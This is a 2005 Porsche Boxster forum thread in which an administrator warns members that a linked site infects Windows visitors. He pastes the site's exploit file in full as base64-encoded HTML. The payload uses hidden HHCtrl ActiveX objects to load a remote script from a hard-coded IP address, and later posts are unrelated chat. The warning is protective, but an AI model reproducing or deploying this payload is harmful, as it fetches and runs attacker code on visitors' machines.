Crown
Board: Porsche - Boxster
Language: English
Region: Worldwide
Close
CloseForum - Thread
Caution...PLEASE READ!!!
Whoever looked at this link (and especially the forum inside the linked website) and didn't use a real-time antivirus/antitrojan software, should definetely be worried.
I accessed the website and the forum with four different virus scanners and ALL of them gave an alert.
I tried to find out what actually happens and here is what I found: when accessing the forum on that website, a newexpl.php is automatically executed. This file contains the following:
From: <x> Subject: x MIME-Version: 1.0 Content-Type: text/html;
charset="utf-8" Content-Transfer-Encoding: base64
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9u
YWwvL0VOIj4KPEhUTUw+PEJPRFk+
CjxPQkpFQ1Qgc3R5bGU9ImRpc3BsYXk6bm9uZSIgaWQ9ImFzZHF3ZSIgY2xhc3NpZD0iY2xz
aWQ6YWRiODgwYTYtZDhmZi0xMWNmLTkzNzctMDBhYTAwM2I3YTExIj4KPFBBUkFNIG5hbWU9
IkNvbW1hbmQiIHZhbHVlPSJSZWxhdGVkIFRvcGljcywgTUVOVSI+
CjxQQVJBTSBuYW1lPSJCdXR0b24iIHZhbHVlPSJUZXh0Ol8iPgo8UEFSQU0gbmFtZT0iV2lu
ZG93IiB2YWx1ZT0iJGdsb2JhbF9ibGFuayI+
CjxQQVJBTSBuYW1lPSJJdGVtMSIgdmFsdWU9ImNvbW1hbmQ7bXMtaXRzOmM6L3dpbmRvd3Mv
aGVscC9udHNoYXJlZC5jaG06Oi9hbHRfdXJsX2VudGVycHJpc2Vfc3BlY2lmaWMuaHRtIj4K
PC9PQkpFQ1Q+
CjxPQkpFQ1Qgc3R5bGU9ImRpc3BsYXk6bm9uZSIgaWQ9ImFzZHF3ZXIiIGNsYXNzaWQ9ImNs
c2lkOmFkYjg4MGE2LWQ4ZmYtMTFjZi05Mzc3LTAwYWEwMDNiN2ExMSI+
CjxQQVJBTSBuYW1lPSJDb21tYW5kIiB2YWx1ZT0iUmVsYXRlZCBUb3BpY3MsIE1FTlUiPgo8
UEFSQU0gbmFtZT0iQnV0dG9uIiB2YWx1ZT0iVGV4dDpfIj4KPFBBUkFNIG5hbWU9IldpbmRv
dyIgdmFsdWU9IiRnbG9iYWxfYmxhbmsiPgo8UEFSQU0gbmFtZT0iSXRlbTEiIHZhbHVlPSdj
b21tYW5kOyBqYXZhc2NyaXB0OmV4ZWNTY3JpcHQoImRvY3VtZW50LndyaXRlKFwiPHNjcmlw
dCBzcmM9aHR0cDovLzE5NS45NS4yMTguMTczL2RsL2FkdjQzOS9KUVRtdWRJLmpwZ1wiK1N0
cmluZy5mcm9tQ2hhckNvZGUoNjIpK1wiPC9zY3JcIitcImlwdFwiK1N0cmluZy5mcm9tQ2hh
ckNvZGUoNjIpKSIpJz4KPC9PQkpFQ1Q+CjxzY3JpcHQ+
YXNkcXdlLkhIQ2xpY2soKTtzZXRUaW1lb3V0KCJhc2Rxd2VyLkhIQ2xpY2soKSIsMTAwKTtz
ZXRUaW1lb3V0KCJkb2N1bWVudC53cml0ZSgnJykiLDIwMCk8L3NjcmlwdD48L0JPRFk+
PC9IVE1MPg==
Now guess what this is...
So if you went to this website and to the forum too, PLEASE scan your computer if you're using Windows!!!
This is actually a hijack attempt.
An online business based in Russia/Poland will pay websites 6 US cents for each machine they infect with adware and spyware.
We will NOT allow the posting of such links on Rennteam.com.
I accessed the website and the forum with four different virus scanners and ALL of them gave an alert.
I tried to find out what actually happens and here is what I found: when accessing the forum on that website, a newexpl.php is automatically executed. This file contains the following:
From: <x> Subject: x MIME-Version: 1.0 Content-Type: text/html;
charset="utf-8" Content-Transfer-Encoding: base64
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9u
YWwvL0VOIj4KPEhUTUw+PEJPRFk+
CjxPQkpFQ1Qgc3R5bGU9ImRpc3BsYXk6bm9uZSIgaWQ9ImFzZHF3ZSIgY2xhc3NpZD0iY2xz
aWQ6YWRiODgwYTYtZDhmZi0xMWNmLTkzNzctMDBhYTAwM2I3YTExIj4KPFBBUkFNIG5hbWU9
IkNvbW1hbmQiIHZhbHVlPSJSZWxhdGVkIFRvcGljcywgTUVOVSI+
CjxQQVJBTSBuYW1lPSJCdXR0b24iIHZhbHVlPSJUZXh0Ol8iPgo8UEFSQU0gbmFtZT0iV2lu
ZG93IiB2YWx1ZT0iJGdsb2JhbF9ibGFuayI+
CjxQQVJBTSBuYW1lPSJJdGVtMSIgdmFsdWU9ImNvbW1hbmQ7bXMtaXRzOmM6L3dpbmRvd3Mv
aGVscC9udHNoYXJlZC5jaG06Oi9hbHRfdXJsX2VudGVycHJpc2Vfc3BlY2lmaWMuaHRtIj4K
PC9PQkpFQ1Q+
CjxPQkpFQ1Qgc3R5bGU9ImRpc3BsYXk6bm9uZSIgaWQ9ImFzZHF3ZXIiIGNsYXNzaWQ9ImNs
c2lkOmFkYjg4MGE2LWQ4ZmYtMTFjZi05Mzc3LTAwYWEwMDNiN2ExMSI+
CjxQQVJBTSBuYW1lPSJDb21tYW5kIiB2YWx1ZT0iUmVsYXRlZCBUb3BpY3MsIE1FTlUiPgo8
UEFSQU0gbmFtZT0iQnV0dG9uIiB2YWx1ZT0iVGV4dDpfIj4KPFBBUkFNIG5hbWU9IldpbmRv
dyIgdmFsdWU9IiRnbG9iYWxfYmxhbmsiPgo8UEFSQU0gbmFtZT0iSXRlbTEiIHZhbHVlPSdj
b21tYW5kOyBqYXZhc2NyaXB0OmV4ZWNTY3JpcHQoImRvY3VtZW50LndyaXRlKFwiPHNjcmlw
dCBzcmM9aHR0cDovLzE5NS45NS4yMTguMTczL2RsL2FkdjQzOS9KUVRtdWRJLmpwZ1wiK1N0
cmluZy5mcm9tQ2hhckNvZGUoNjIpK1wiPC9zY3JcIitcImlwdFwiK1N0cmluZy5mcm9tQ2hh
ckNvZGUoNjIpKSIpJz4KPC9PQkpFQ1Q+CjxzY3JpcHQ+
YXNkcXdlLkhIQ2xpY2soKTtzZXRUaW1lb3V0KCJhc2Rxd2VyLkhIQ2xpY2soKSIsMTAwKTtz
ZXRUaW1lb3V0KCJkb2N1bWVudC53cml0ZSgnJykiLDIwMCk8L3NjcmlwdD48L0JPRFk+
PC9IVE1MPg==
Now guess what this is...
So if you went to this website and to the forum too, PLEASE scan your computer if you're using Windows!!!
This is actually a hijack attempt.
An online business based in Russia/Poland will pay websites 6 US cents for each machine they infect with adware and spyware.
We will NOT allow the posting of such links on Rennteam.com.
Jun 22, 2005 11:14:52 PM
- Paulo_Rangel_Melo
- Expert
-
- Loc: Portugal , Portugal
- Posts: 1528, Gallery
- Registered on: Nov 23, 2003
-
Reply to:
RC
Jun 22, 2005 11:21:28 PM
-
RC
- Rennteam Administrator
-
- Loc: Rennteam HQ , Germany
- Posts: 59602, Gallery
- Registered on: Mar 26, 2002
- Reply to: Paulo_Rangel_Melo
Re: Caution...PLEASE READ!!!
Quote:
paulorangelmelo said:
Many thanks...By the way, from some posts and coincidently (how the hell you write coinci...), Russia comes to the subject you seem to know a lot about Russia..
This may seem stupid but...were you born in the mighty former Soviet Union???
Woshhhhhhhhhhh
Nope. My father is from Russia but he left several decades ago. But I worked many years in the former Eastern Block in the diplomatic service while the "reds" were still ruling politics.
I learned a lot about politics, freedom, acquiring food and friendship. And I learned to appreciate the freedom and economy we have over here in the West. And from a pretty liberal type of guy, I became pretty conservative regarding my political views.
Re: Caution...PLEASE READ!!!
Quote:
brunner said:
You entered diplomatic service at 17? Wow
Huuh?
Your beloved shoemaker has been executed in 1989 as far as I remember. I was 24 by that time and had already spent three years in service. The other four years (with a short pause and a change of mission) from 1989 to 1993. And I don't think that you consider the friendly guy who sent for the miners to be a capitalist.
And no, I won't tell any more details. Maybe one last: do you remember the picture with the miners coming towards Intercontintal Hotel in the early morning hours in the french magazine Paris Match? Well, it was shot from my car, I came from the US marine house after a nice party and "saved" two journalists and a photographer who were trapped there without a car.
Now I shut up. 
Re: Link from another Boxster forum
Sorry guys! Hope I didn't lure you in there. But I just skooted to the Jokes and Pics pages. I didn't look at the forum. Nothing flagged on my PC (Firewalled and Macafee'd) - I'm just doing a scan now. I applied this months MS security patches (like a good boy) the other day, so that may have closed a loophole that others were still exposed to.
Will let you know how it goes. I NEVER get virus warnings, (Which sometimes makes me paranoid that my security isn't working properly!)
Will let you know how it goes. I NEVER get virus warnings, (Which sometimes makes me paranoid that my security isn't working properly!)
Forum
About Rennteam | Help | Terms of use | Privacy Policy | Support | Contact | Imprint | Archive
Powered by
Community
and
